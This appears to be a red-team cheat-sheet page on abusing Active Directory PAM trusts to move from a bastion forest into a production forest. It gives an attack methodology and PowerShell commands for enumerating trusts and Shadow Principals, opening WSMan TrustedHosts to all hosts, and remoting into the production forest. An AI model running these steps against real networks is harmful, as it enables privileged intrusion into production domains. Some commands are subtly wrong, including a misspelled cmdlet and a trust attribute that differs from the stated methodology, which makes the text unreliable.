# pam-trust

* Usually enabled between Bastion or Red Forest and prod/user forest
* allows high-privileged access to prod forest without needing credentials from a bastion forest
  * requires the creation of Shadow Principals in bastion domain that are mapped to DA or EA in prod forest

## Methodology

1. Enumerate trusts.
2. Enumerate PAM trusts (ForestTransitive true and SIDFIlteringForestAware is false).
3. Enumerate `Shadow Principals`.
4. Abuse PAM trust.

## Powershell

> \[!INFO] Remember to follow the Powershell methodology

## ADModule

<https://github.com/samratashok/ADModule>

```
Get-ADTrust -Filter *
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local
```

**Enumerate if PAM trust exists**

```
$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTruzst -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}} -Session $bastiondc
```

**Check members of Shadow Principals**

```
Invoke-Command -ScriptBlock {Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl} -Session $bastiondc
```

**Configure WSMan to allow PSRemoting via IP Address Set-Item**

```
WSMan:\localhost\Client\TrustedHosts * -Force
```

**PSRemote into prod\_forest**

```
Enter-PSSession <PROD_FOREST_IP_ADDRESS> -Authentication NegotiateWithImplicitCredential
```

> \[!INFO] when PSRemoting using an IP address, you must use NTLM authentication